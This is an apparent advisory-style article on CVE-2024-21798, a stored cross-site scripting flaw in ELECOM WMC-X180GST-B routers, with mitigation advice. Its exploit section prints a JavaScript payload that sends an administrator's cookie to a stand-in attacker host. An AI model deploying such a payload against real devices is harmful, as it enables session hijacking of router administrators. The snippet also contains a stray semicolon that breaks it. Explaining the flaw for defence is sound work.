CVE-2024-21798: Cross-Site Scripting Vulnerability in ELECOM Wireless LAN Routers and E-Mesh Starter Kit

The Common Vulnerabilities and Exposures (CVE) system has identified a new vulnerability, CVE-2024-21798, which affects ELECOM Wireless LAN routers, specifically the WMC-X180GST-B model. This vulnerability pertains to a cross-site scripting (XSS) issue that can allow an attacker to perform malicious activities when a user operates the product through the web browser. In this article, we will explore the details of this vulnerability, demonstrate a code snippet exploiting it, and offer suggestions on how to mitigate it. We will also provide information on affected devices and links to all original references.

Vulnerability Details

CVE-2024-21798 exists due to a cross-site scripting (XSS) vulnerability in ELECOM wireless LAN routers, particularly the WMC-X180GST-B model (also included in e-Mesh Starter Kit "WMC-2LX-B"). The vulnerability allows an attacker to inject arbitrary scripts into the web interface of the router. If a malicious user gains administrative access to the router's web administration interface, they can manipulate content in a way that when another user logs in and performs actions via the web interface, malicious scripts may be executed on the web browser.

Exploit Details

To exploit this vulnerability, the attacker needs to configure the router with malicious content. When another administrator logs in and operates the device, an arbitrary script may be executed on the user's web browser. Here is an example of a script that can exploit this vulnerability:

<script>
  function stealCookie() {
    var xhr = new XMLHttpRequest();
    var cookie = document.cookie;
    xhr.open("GET", "https://attacker.example.com/save?cookie="; + encodeURIComponent(cookie), true);
    xhr.send();
  }
  stealCookie();
</script>

The above JavaScript code snippet demonstrates how an attacker can steal the cookie information of a logged-in administrator by exploiting the XSS vulnerability. By injecting this script into the router's web interface, the attacker can extract sensitive information, such as login credentials or other personally identifiable information.

References

- CVE-2024-21798 - Vulnerability Database
- ELECOM Wireless LAN Router Security Bulletin
- National Vulnerability Database (NVD) – CVE-2024-21798

Mitigation Steps

1. Update firmware: ELECOM has released a firmware update that addresses this vulnerability. Users are advised to update their router’s firmware to the latest version to eliminate this risk.

2. Limit administrative access: Ensure that only trusted individuals have administrative access to the ELECOM router web interface. Use strong, unique passwords for each administrator account.

3. Educate users: Train users handling the administrative operations on the router about the risks and signs of XSS attacks. Users should never click on suspicious links or visit websites of untrusted origin.

4. Use a secure, modern web browser: Make sure that you keep your web browser updated to the latest version, as modern browsers provide better protection against XSS attacks.

By following these steps, you can significantly reduce the risk of succumbing to an attack exploiting CVE-2024-21798 in your ELECOM wireless LAN router or e-Mesh Starter Kit.

Timeline

Published on: 02/28/2024 23:15:09 UTC
Last modified on: 09/09/2024 06:34:38 UTC